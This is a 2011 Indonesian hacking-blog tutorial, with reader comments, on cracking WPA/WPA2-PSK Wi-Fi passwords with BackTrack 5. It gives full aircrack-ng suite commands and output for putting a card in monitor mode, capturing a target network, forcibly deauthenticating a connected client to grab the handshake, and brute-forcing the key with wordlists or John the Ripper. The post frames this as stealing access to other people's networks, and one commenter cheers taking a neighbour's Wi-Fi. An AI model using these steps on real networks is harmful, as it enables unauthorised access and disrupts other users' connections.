Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Wireless Hacking – Cracking WPA / PSK Key

25 December 2011
Penulis:   · Kategori Artikel: Cracking

BINUS HACKER Binus Hacker Is Not Criminal Banner

BINUS HACKER

BINUS HACKER


Selamat Hari Natal Semuanya! Merry Christmas BinusHacker Family

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.

Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)

Download BackTrack 5 Disini:

Download BackTrack 5

Download Wordlist John The Ripper Disini:
Download Wordlist

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)

Wireless Hacking Using BackTrack 5

Oke mari kita lanjutkan:

1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)

2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:


root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

 

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

 

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:


root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

 

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 – 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:00] 48 keys tested (489.60 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:22] 11484 keys tested (534.50 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD

Untuk lebih detailnya, silakan lihat video berikut:

BINUS HACKER Binus Hacker Chat and Forum

Komentar

79 Komentar Untuk “Wireless Hacking – Cracking WPA / PSK Key
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. ipunk pada 15 November 2012 8:14 am

    mas kalo maumulai cracking wifi itu apa harus seting wifi dahulu…
    #help

  2. Iks pada 13 December 2012 8:51 pm

    gan aq ah nginstall BT5 R2 GNOME dual boot ma Windows 7 tapi wirelessnya ko gak aktif ya???
    waktu nyoba airmon-ng start wlan0

    Interface Chipset Driver gak ada reaksinya ,..
    tulung bantuan e gan???

  3. RamboSality pada 20 December 2012 4:16 pm

    Gan,, Ini Link wordlist JTR nya broken
    ada lagi ga link wordlist nya?

    oiya klo make metode bruteforce gimana ??..

  4. zakau pada 11 January 2013 3:29 pm

    om lw bwt windows 7 ad cara nya ga ?

  5. wali pada 19 January 2013 11:21 am

    Q mau tny ssuatu bisa g kira2 om

  6. Fajrul pada 27 January 2013 6:04 am

    lumayan ambil jaringan tetangga

  7. Lutfi Backtrack Ind pada 17 February 2013 1:37 am

    kok hasil akhirnya gini kak tulisannya :

    Opening /tmp/wpa2-01.cap
    Target network doesn’t seem encrypted.

    Quitting aircrack-ng…

    mohon penjelasannya ….

  8. zigas pada 25 March 2013 8:10 pm

    gan saya mau tanya jika saat kita membobol sebuah pass wireless disuruh untuk memasukkan word list jhon the ripper saat sudah saya masukkan ternyata muncul tulisan ” quit aircrack-ng ” dan gak bisa nemuin passwordnya gimana gan solusinya mohon bantuanya klo bisa kirim ke email zainul.corp@gmail.com saya tunggu gan maju terus

  9. wendi pada 26 March 2013 4:13 am

    pake tol reaver di backtrak 5 aj dong…gk perlu ribet mas brow…tinggl ngopi aja dah bs dpt pass wep/psk2, atau gerix untuk wifi securty tipe wap jd tinggl klik….untuk yg pke windows 7 jgn sedih kan bs dual boot mngunakan vm ware…pokoknya dijamin dehh…tutor cari di youtube banyak skali para jenius yg mau bagi ilmuny..ane pke wifi card type realtek 8187b/g d laptop toshiba l 510 i lawas….wkwkwkw

  10. 12dani pada 7 April 2013 9:00 am

    gan ane mau minta itung itungan buat eks indovisen di jadin antena werles makasihhhhh…. tolong pencerahan nya

  11. Deni Setiawan Putra pada 30 May 2013 5:48 pm

    di bikin ebooknya dunk .pleasse

  12. nono pada 3 June 2013 8:05 pm

    kalau misalnya dari user pakai fasilitas “connect automatically” , pada saat mereka login / logout dari jaringan wireless , itu kira-kira passwordnya bisa diretas tidak ???

  13. edo pada 12 June 2013 8:09 pm

    gan ane minta link john the riper yg bisa di download dong. link yg di atas gk bisa di download .???

  14. Nadhia pada 26 June 2013 10:35 am

    “Mau tanya pak komandan…??Tutorial videonya da nggk..??

  15. Fitri18 pada 28 June 2013 8:10 pm

    Salam knal Bro!
    Info dan masukan nya boleh jg ne,wat nambah2 wwasan & pengetahuan dunia hack.
    tapi mo di coba2 takut2 juga yaa..
    trims aza deehh..

    fitri.

  16. back to track pada 5 August 2013 12:29 am

    Yang masih nanya pakai Windows bisa apa tidak, ke laut aja lu. Yang dibicarakan disini operasi Linux bukan Microsoft, dasar dongo bisanya pakai bajakan.

  17. ferdy pada 14 October 2013 10:22 am

    gak da gunanya password itu klo buat wpa2

  18. kampret pada 7 November 2013 1:23 pm

    heck password wpa2-psk sampai saat in belum ada yg mampu…. jadi jangan mimpi, semua itu bohong.

  19. milestone22 pada 1 June 2014 4:19 am

    wah, kirain WEP doang yang bisa dicrack. ane coba dulu deh pake tutorial binushacker

  20. see kiong pada 31 July 2014 5:16 am

    wah,cara lama masih dipakai,katanya tunggu 30 jam saya rasa 40th kali bahkan ratusan tahun bikin lap top rusak aja,router sekarang proteksinya sudah canggih,kalau gak pake wireshark eapolnya gak di pilah pilih dan di cuci wpa clean,sampai kiamat juga gak ketemu passwordnya

  21. akbar hose pada 6 September 2014 7:44 am

    bro ini kn aq pke wifi, ud dpt pasword.a pdahal tlisanx sdh terauthentikasi
    . tp tetap aja mzh gk konek internet.a pdahal snyal wifi.a udh ada, tp da lmbang.a gembok mzh terkunci gt .
    bz d bntu gk bro.

    by akbar hose

  22. Rohman Wahid pada 3 January 2015 3:59 am

    ane gak begitupaham:3

  23. rangga pada 17 January 2015 9:49 pm

    kyk pasang keylogger di wifi nih :v

  24. hang puriah pada 1 March 2015 3:51 am

    izin nyimak gan..

  25. Cara Instal Bt5 | Kumpulan Cara dan Pengetahuan pada 4 March 2015 5:17 am

    […] Wireless hacking – cracking wpa / psk key […]

  26. Eka Ramadhan pada 30 April 2015 12:19 am

    kk ane mau tanya
    ane udah nyoba backtrack di virtualbox
    tapi ane punya kendala
    saat scanning, wifi nya gak detect
    tolong bantu ane mengatasi masalah ini

  27. dandi pada 26 May 2015 2:28 am

    kaka paswword WIFI WPA2 PSK apaan

  28. Abdullah Hacker Newbi pada 11 June 2015 8:39 am

    Gak Faham Sama Sekali Gaaaaan :(

  29. B1TCH4CK3R pada 27 July 2015 5:57 am

    ya iyalah , password nya disesuain sama dictionary, sama aja boong….

Silahkan Berikan Tanggapan Anda...